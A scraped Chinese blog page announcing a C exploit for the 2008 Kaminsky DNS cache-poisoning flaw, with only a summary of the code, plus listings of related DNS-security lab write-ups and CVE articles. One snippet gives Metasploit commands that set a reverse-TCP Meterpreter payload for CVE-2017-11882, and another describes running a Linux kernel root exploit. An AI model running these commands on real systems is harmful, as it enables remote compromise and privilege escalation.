Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack (DNS中毒工具)

最新推荐文章于 2022-08-10 10:05:02 发布
原创 最新推荐文章于 2022-08-10 10:05:02 发布 · 2.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#cache #工具 #domain #struct #query #class

这是一个利用CVE-2008-1447漏洞进行DNS缓存投毒攻击的C语言实现。该程序依赖libdnet库,用于构建和发送DNS查询和响应,包含DNS包结构定义、域名格式化、查询和资源记录格式化等关键函数。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

DNS服务器漏洞
itclock的专栏
07-28 1484
Infoworld 报道,著名黑客HD Moore已经率先公布了可用代码.利用这段代码可以对DNS服务器进行投毒,将一条恶意纪录植入目标服务器,该服务器将随机发起域名查询,此时攻击者可以提供伪造的响应,将域名服务器中的纪录指向其特定站点.这个漏洞攻击可以默默的改变用户的升级服务下载恶意软件,IOActive研究者Dan Kaminsky很早发现漏洞并且无意中这周公布了漏洞使得开发出攻击代码.i
详解DNS缓存中毒攻击原理以及dns病毒解决办法
10-01
现在大家都知道,缓存中毒攻击者给DNS服务器注入非法网络域名地址,如果服务器接受这个非法地址,那么缓存就被攻破了
DNS安全】Kaminsky攻击
weixin_30460489的博客
01-26 1521
最近有时间,有精力,继续开展研究。 按照计划,把DNS相关理论、协议漏洞、攻击方法和防护手段,研究并总结。 今天的Kaminsky攻击时Dan Kaminsky研究员于2008年发布的DNS协议漏洞,据报道当时因此产生轩然大波,所以我收录一下。 下面这段是转载,因为原理就是这样的: “一年多前,安全研究员Dan Kaminsky披露DNS存在严重漏洞曾经轰动了整个IT世界。...
SeedLab8: Remote DNS Attack (Kaminsky Attack) Lab
Rachel_IS的博客
01-19 3028
做完了本地的,来康康远程的 难点就是不能嗅探数据包再进行伪造了,一些字段要通过猜测得到 Task 1 local里配过了,验证一下就行 Task 2 按教程配一条转发 (因为我们自己设置的域名是真实存在的…如果将其作为权威服务器,那么本地DNS服务器会向顶级DNS服务器请求它的IP,然后发送请求,但是这就超出了我们的控制范围 (配一条转发,就是让DNS服务器把对这个权威服务器的请求都发往我们能控制的IP 其他的按教程删改 Task 3 attacker上配两个zone文件(网站上下载模版 (这里要注
漏洞复现:DNS 缓存投毒的经典—— 2008kaminsky 漏洞
闵行小鱼塘
07-06 3157
最近研究DNS缓存投毒,那么经典的 kaminsky 漏洞自然是要尝试复现的。先用msf现成脚本,再根据理解自己写exp。巧合而又不幸的是:kaminsky大神陨落于2021.4.23,谨以此篇文章纪念大神传承遗志
【SEED LABS】The Kaminsky Attack Lab
qq_43599063的博客
08-10 2697
这个实验的目的是让学生获得关于远程DNS缓存中毒攻击(也称为Kaminsky DNS攻击)的第一手经验。DNS(域名系统)是互联网的电话簿;它将主机名转换为IP地址,反之亦然。这种转换是通过DNS解析进行的,它在幕后进行。DNS攻击以各种方式操纵这个解析过程,目的是将用户误导到其他目的地,这通常是恶意的。这个实验室专注于一种特殊的DNS攻击技术,称为DNS缓存中毒攻击。 • DNS and how it works • DNS server setup • DNS cache poisoning attac
Jboss Application Server反序列化命令执行漏洞利用工具CVE-2017-12149)
07-23
在2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
CVE-2021-1732-Exploit:CVE-2021-1732漏洞利用
03-06
在提供的压缩包中,"CVE-2021-1732-Exploit-main"可能是一个示例代码或者利用程序,用于演示如何触发这个漏洞。研究这个文件可以帮助安全专家理解漏洞的工作原理,从而更好地防御和修复。不过,直接运行这样的文件...
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
最新发布
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
DNS缓存投毒攻击原理与防御策略.pdf
06-03
DNS缓存投毒攻击原理与防御策略论文,转载自知网!
CVE-2017-8759-Exploit-sample-master
07-05
CVE-2017-8759-Exploit-sample-master,漏洞示例代码。
多家厂商DNS实现缓存中毒漏洞
|独自望海。。。
07-31 2275
发布日期:2008-07-08更新日期:2008-07-10受影响系统: Cisco IOS 12.4Cisco IOS 12.3  Cisco IOS 12.2Cisco IOS 12.1Cisco IOS 12.0ISC BIND 9.5.xISC BIND 9.4.xISC BIND 9.3.xISC BIND 9.2.xISC BIND 8.x.xMicrosoft Windows X
微软发布4个严重级别漏洞 应尽快升级
cuizui7685的博客
07-21 560
微软近日发布了今年七月的安全公告,4个补丁均为“严重”级别。受影响的产品是Windows域名服务、Windows vista系统中的Windows Explorer、Outlook Web Access和Micros...
工具】Nmap
尚未佩妥剑 转眼便江湖
12-02 8401
Nmap工具帮助说明 语法: nmap [扫描类型] [选项] [目标规范] 目标规范 可以传递主机名、IP地址、域名等。可以指定单个IP或IP段 eg:192.168.1.0/24、192.168.1.1,2,3-15 -iL <filename>:从文件中导入扫描目标 eg:nmap -iL ip.txt -iR <num hosts>:随机选择目标,参数指定N...
CVE-2017-0144 (Windows server 2008系列缓冲区溢出漏洞)
Fly_鹏程万里
03-15 8785
漏洞原理srv.sys在处理SrvOs2FeaListSizeToNt的时候逻辑不正确导致越界拷贝。我们首先看下漏洞的触发点:unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2) {   int v4; // edi@1   _BYTE *v5; // edi@1   unsigned int result; // eax@1   v4 = a...
MS08-067远程溢出漏洞(CVE-2008-4250)
n5xxxx__zy的博客
07-15 4196
MS08-067远程溢出漏洞 漏洞原理简述 攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call 远程过程调用)请求,通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发,NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonic...
metasploit利用CVE-2017-11882
公众号shadow sock7
08-19 1253
./msfconsole use exploit/windows/fileformat/cve_2017_11882 set URIPATH test set payload windows/meterpreter/reverse_tcp set lhost 172.18.126.113 set FILENAME helloword.doc
Black Hat 2008 观察第一天
10-23 1521
 编者按:全球瞩目的信息安全会议Black Hat USA 2008上周在美国拉斯维加斯开幕,众多的安全厂商和独立安全研究人员都在会上发表了自己最新的研究成果。作为亲身经历的Wayne,将自己的所见、所闻、所想与大家分享。会场就在我住的旅馆的对面,但是还是很早起床,因为每天都很忙,除了听一些 talk 还有很多人要碰。今天天气很好,有太阳时才发现我房间看出去的view还不错:screen.widt
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值